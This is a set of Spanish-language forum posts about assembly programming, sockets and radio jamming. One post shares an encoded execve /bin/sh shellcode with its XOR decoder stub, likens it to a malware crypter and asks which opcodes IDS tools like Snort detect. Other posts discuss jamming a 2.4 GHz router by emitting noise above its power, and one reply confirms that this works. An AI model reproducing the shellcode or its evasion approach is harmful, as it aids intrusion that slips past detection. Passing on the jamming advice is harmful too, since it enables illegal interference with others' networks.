Mensajes

Hola

Pues eso me gustaria rotar un byte en los cuatro doublewords que tiene un registro XMM. Hay una instruccion llamada vprotd pero no dispongo de la bandera XOP.

Como podria hacer ese tipo de rotacion, lo mas eficiente posible. Este es lo que pretendo.

Código (asm) [Seleccionar] Expandir

0x63cab704ffed010408040cffee4488dd  rot 1 ----> 0xcab70463ed0104ff040cff084488ddee

Un saludo.

Pero tienes que pasar la estructura como puntero.

Código (asm) [Seleccionar] Expandir

mov rbx, 0100007FB9220002h
push rbx
mov rdx, rsp

Un saludo.

Recuerda que en Windows y 64 bits se sige el siguiente orden, rcx, rdx, r8 y r9. Ademas no estas pasando la estructura sockaddr_in como puntero.

Un saludo.

Hola

Como no hay muchos temas de estos en el foro les dejo este aporte, se trata de la tipica execve /bin/sh. No esta testeada ya que utilizo OpenBSD y no puedo ejecutar nada desde la memoria, para la Linux cambien el numero de la syscall, tendria que funcionar.

Este codigo lo cree para poner en practica mis conocimientos, si alguien da un mal uso es su problema, no soy responsable.

Código (c) [Seleccionar] Expandir

"\xeb\x0c\x5e\x46\x31\x24\x8e\x41\xfe\xc9\x75\xf7\xff\xe6"
"\x41\xb1\x06\x4d\x31\xe4\x41\xff\xcc\xe8\xe6\xff\xff\xff"
"\xb7\x44\xe8\x4e\xcb\x48\x68\xc6\xcb\x7f\xb7\x2e\x3c\xac"
"\xab\xa0\xb7\xce\x3f\xaf\xab\xa1\xb7\x66\x4f\xc4\xf0\xfa";

Este es el Encode.

Código (asm) [Seleccionar] Expandir

_start:

jmp _C.2

_C.0:

popq %rsi

_C.1:

xorl %r12d, (%rsi, %r9, 4)
decb %r9b
jnz _C.1
jmp *%rsi

_C.2:

movb $0x6, %r9b
xorq %r12, %r12
decl %r12d
call _C.0

Como pueden observar es casi identico por no decir que es completamente identico al de un crypter de un troyano o malware similar. Tengo bastantes ideas de como mejorar el cifrado, si alguien se anima que lo comente, y cualquier pregunta sobre el codigo ya saben.

Un saludo.

P.D: Alguien sabe cuales son los opcodes que detecta un IDS? Por ejemplo se que Snort detecta los NOP y /bin/sh.

Hay GPUs de gama alta que estan por los 3 Teraflops y incluso que superan los 4, por ejemplo mi HD 5870 esta en unos 2,7 Teraflops y eso que algo vieja, pero no se queda atras.

Tambien hay un superordenador chino que utiliza GPUs Nvidia, si no recuerdo mal tambien tenian uno con HD 4870.

Un saludo.

Bueno, a ver si aparece alguien que sabe mas del tema, si tengo un amplificador de 2 W que los he visto, y una antena de alta ganancia tendria que inhibir todo lo que este en unos 20 metros y ha esa frecuencia ya que los routers caseros estan entre los 100mW y los 200mW.

Pero entonces no podria conectarme al router ya que le puedo enviar paquetes pero el ami no, no es asi?

Y en teoria si instalo un amplificador de esos, podria causar problemas a los demas ya que estoy emitiendo a una potencia muy superior, no?

Un saludo.

Cualquier dispositivo que se comunique por ondas es susceptible de ser inhibido... si quieres inhibir el router basta con que emitas ruido a 2.4 GHz a más de 200mW cerca del router.

Si, es eso lo que pretendo, para emitir ruido basta con hacer un scan a esa potencia, o como mandar a la tarjeta que emita ese ruido vacio como el del inhibidor?

Esto quiere decir que si lo que emite la tarjeta le llega al router, pero éste es incapaz de comunicarse con la tarjeta la comunicación no funciona.

Bastaria que me conectara a el, ahora entiendo porque cada pais tiene sus estandares, y porque linux tiene programas como crda. Pero toda esta gente que auditora redes inalambricas y sube la potencia a unos 30 dbm que es el 1 W no esta inhibiendo, porque le funciona la comunicacion entre los routers?

Un saludo.

P.D: A ver si continuo con el tema que deje apartado en ASM.

Hola

Bueno lo primero de todo es que no se piensen que quiero cometer un delito, simplemente es curiosidad.
Estaba mirando estos dispositivos y me parecen muy interesantes, he mirado el funcionamiento, operan a la misma frecuencia que el dispositivo a inhibir pero con una potencia de onda mayor.

Mi pregunta es la siguiente.

Si mi router funciona en la frecuencia 2,4 Ghz a unos 200 mW, y tengo una tarjeta que funciona a la misma frecuencia pero a 1 W no se podria inhibir ese router?

Un saludo.

Duda :
No entiendo , cambio el valor de una direccion en memoria o estoy metiendo la direccion de memoria(Supongo q es la ultima).

Estas reservando espacio en la pila, luego copiando la direccion de 0x41414141 en ese espacio que reservaste.

Ejemplo:

Código (asm) [Seleccionar] Expandir

pushq $0x6001e0   ; direccion de 0x41414141
addb $0x2, (%rsp)
popq %rdi

Dejaria apuntando a 0x4141 en rdi.

La verdad no entendi muy bien tu duda, si no es eso reformula de nuevo la pregunta.

Un saludo.

No prefieres un editor como Vim, creo que si soporta esa sintaxis.

Un saludo.